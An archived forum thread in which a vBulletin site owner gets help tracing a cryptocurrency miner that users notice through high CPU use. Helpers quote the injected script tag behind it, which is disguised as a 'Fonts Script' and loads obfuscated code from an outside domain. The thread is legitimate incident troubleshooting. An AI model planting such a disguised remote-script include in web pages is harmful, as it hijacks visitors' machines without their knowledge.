vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Forum users complaining bitmining malware is running. (https://vborg.vbsupport.ru/showthread.php?t=326225)

MasturB 03-21-2018 06:38 AM
Forum users complaining bitmining malware is running.
 
Hello,

A few of my users have reported that my website currently has bitmining malware running whenever they visit it.

They're CPU activity monitors are skyrocketing when they enter my site and then it drops once it closes it in the browser. Any suggestions?

Dave 03-21-2018 01:37 PM
View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.

MasturB 03-21-2018 05:36 PM
Quote:
Originally Posted by Dave (Post 2593647)
View the source-code of your website and find the miner name, then search for that name in your theme's templates and/or plugins. We need a bit more information in order to help you, e.g. URL to the site.
Thanks Dave.

Its chopcountry.com

final kaoss 03-21-2018 05:57 PM
I notice that on your site, ublock is blocking a resource from.
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml

Also your site is marked as infected.
https://sitecheck.sucuri.net/results...rums/forum.php

MasturB 03-21-2018 06:03 PM
Quote:
Originally Posted by final kaoss (Post 2593652)
I notice that on your site, ublock is blocking a resource from.
31.187.64.40
https://www.abuseipdb.com/whois/31.187.64.40
And
analytics-scripts.ml
I just got off the phone with GoDaddy Security Tech. He checked the SQL for GoDaddy Hosting, and oddly enough he said there was a Stats Collector in the script/software that was hoarding all the CPU resources.

He obviosuly wasn't allowed to go in Admin and look, but he seemed pretty confident it was a Stats thing that was using up all the CPU.

So the stats thing might be the analytics scripts you've found.

Dave 03-21-2018 06:36 PM
At the bottom of your page you have:
HTML Code:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.

MasturB 03-21-2018 06:39 PM
Quote:
Originally Posted by Dave (Post 2593654)
At the bottom of your page you have:
HTML Code:
<!-- Fonts Script -->
<script type="text/javascript" src="http://analytics-scripts.ml/js/sans-serif.js"></script>
<!-- End Fonts Script -->
which contains code that looks extremely fishy (obfuscated). I would remove it asap. It definitely does not look like a legitimate analytics script.
How do I remove it?

Do I go through Admin panel? Keep in mind I'm practically a novice at this. When I bought the license and hosting in 2013, I was doing my best to learn on the fly and play around with stuff through trial and error to learn. But since the website has been running smooth wit no issues for the last 5 years there was no reason for me to stay sharp on all of this.


All times are GMT. The time now is 07:22 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01258 seconds
  • Memory Usage 1,725KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_html_printable
  • (3)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (7)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete